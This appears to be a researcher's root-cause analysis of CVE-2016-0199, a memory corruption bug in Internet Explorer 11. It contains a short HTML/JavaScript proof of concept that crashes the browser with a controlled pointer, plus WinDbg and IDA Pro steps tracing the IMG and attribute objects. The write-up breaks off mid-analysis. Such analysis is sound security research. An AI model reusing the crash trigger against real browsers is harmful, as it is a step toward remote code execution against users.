CVE-2016-0199

0x0 Enviroment:

  • Windows 7 SP1 32-bit
  • IE 11
  • Windbg

0x1 POC:

1
2
3
4
5
6
7
8
9
10

<meta http-equiv="X-UA-Compatible" content="IE=7">
<script>
oElement = document.createElement("IMG");
var oAttr = document.createAttribute("loop");
oAttr.nodeValue = oElement;
oElement.loop = 0x41424344;
oElement.setAttributeNode(oAttr);
oElement.removeAttributeNode(oAttr);
CollectGarbage();
</script>

0x2 Vulnerability Reproduce

Run the poc and get crash in windbg:

Here we get Access violation exception

1
2

jscript9!JavascriptThreadService::EnumerateTrackingClient+0x59252:
695b0de2 8b30            mov     esi,dword ptr [eax]  ds:0023:41424344=????????

Next we need to locate this code in jscript9.dll in IDA Pro. The address is 0x695b0de2 and we need to get base address of this DLL:

lmvm jscript9

lmvm - Dumps information about the module. Remember to use and not <module.dll>.

start address is 0x693b0000, so the address we want to check in IDA Pro is :

2:051> ? 695b0de2 - 693b0000 + 10000000

so the address is 0x 10200de2.

In IDA Pro, locate the code:

based on the code:

1
2
3
4

.text:10200DE2                 mov     esi, [eax]
.text:10200DE4                 mov     ecx, [esi+44h]  ; void *
.text:10200DE7                 call    ds:___guard_check_icall_fptr
.text:10200DED                 call    dword ptr [esi+44h

we can guess, eax has C++ object base address and that address -4 should contain vtable address. To verifiy the assumption. Modify the PoC:

1
2
3
4
5
6
7
8
9
10
11

<meta http-equiv="X-UA-Compatible" content="IE=7">
<script>
alert(0);
oElement = document.createElement("IMG");
alert(1);
var oAttr = document.createAttribute("loop");
alert(2);
oAttr.nodeValue = oElement;
alert(3);
CollectGarbage();
</script>

We want to set break point at jscript9!JavascriptThreadService::EnumerateTrackingClient+0x59252

however, since the dll is not loaded when we restart debugging. We can use windbg command sxe ld:modulename command to break when jscript9.dll first time load, and then we can set the breakpoint on that address.

sxe ld:jscript9 lmm jscript9 bp jscript9!JavascriptThreadService::EnumerateTrackingClient+0x59252 bl

As you can see, we get the vtable address.

Next rewrite the poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

<meta http-equiv="X-UA-Compatible" content="IE=7">
<script>
alert(0);
oElement = document.createElement("IMG");
alert(1);
var oAttr = document.createAttribute("loop");
alert(2);
oAttr.nodeValue = oElement;
alert(3);
oElement.loop = 0x41424344;
alert(4);
oElement.setAttributeNode(oAttr);
alert(5);
oElement.removeAttributeNode(oAttr);
alert(6);
CollectGarbage();
</script>

The poc create IMG object and attribute loop.So we need to find out these two addresss. First of all, set hpa and ust

gflags /i iexplore.exe +hpa +ust

Then use IE to open poc file, and attach to windbg,

and use x MSHTML!CImgElement::* to list all clmgelement functions

CreateElement function will create object. set breakpoint here and run

bp MSHTML!CImgElement::CreateElement; g

Click messagebox in webpage and we hit the breakpoint:

step in p

p

p

p

p

p

p

HeapAlloc creates a buffer, size is 0x5c and the address is in eax, 0x0d524fa0.

Address 0x0d524fa0 will be IMG object’s address. But why?

Keep going on

a few ps

since before calling MSHTML!CImgElement::CImgElement, ecx contains eax value 0d524fa0

Use dps command (display pointers and symbols):

dps 0d524fa0

This is vtable address.

next try to search Attribute object base address

MSHTML!CAttribute::*

It is a constructor function. Put a breakpoint here.

bp MSHTML!CAttribute::CAttribute

and g, will hit alert(1); in poc. click ok.

keep step in and reach here:

so attribute object base address in ebx and its value is 0x0d5a2fa0

so address of IMG is 0x0d524fa0 address of Attribute is 0x0d5a2fa0.

Back to PoC:

1

oAttr.nodeValue = oElement;

This line will assign an IMG object to a memeber of the attribute object. Lets search which function can do this:

x MSHTML!CAttribute::*

seems MSHTML!CAttribute::put_nodeValue can do this. set the breakpoint:

bp MSHTML!CAttribute::put_nodeValue and go

click ok

and we reach MSHTML!CAttribute::put_nodeValue:

check the call stack:

do dps 0d5a2fa0

Seems the breakpoint is correct. put_nodeValue seems the entry of the assignment. Keep going.

use command t to trace down

do dps 0d5a2fa0

now we can see, IMG object address is copied to attribute object and offset is 0x30

next in POC:

1

oElement.loop = 0x41424344;

We want to locate the address of this code, first of all,

do s-d 0x0 L?0x7fffffff 41424344 to find the 41424344 and then execute the code and find the extra one, that should be the address of the 41424344 in the poc code.

then keep goin, press g and after alert(4) popup,

do s-d 0x0 L?0x7fffffff 41424344

we have new address 0x14162fc8

!heap -p -a 14162fc8

we found useraddr is 14162fc0, so the memory is allocated from 14162fc0 and 41424344' address is 8 bytes behind it.

set bp

bp MSHTML!CImplAry::EnsureSizeWorker+0x00000063

HeapAlloc assign memory, the address is 12fd1fc0

step in and check edi:

dps edi

now remember IMG object address is 0x0d524fa0

the whole process is :

back to POC:

1

oElement.setAttributeNode(oAttr);

do x mshtml!CElement::setAttributeNode

set bp: bp mshtml!CElement::setAttributeNode

and finally got:

vulnerability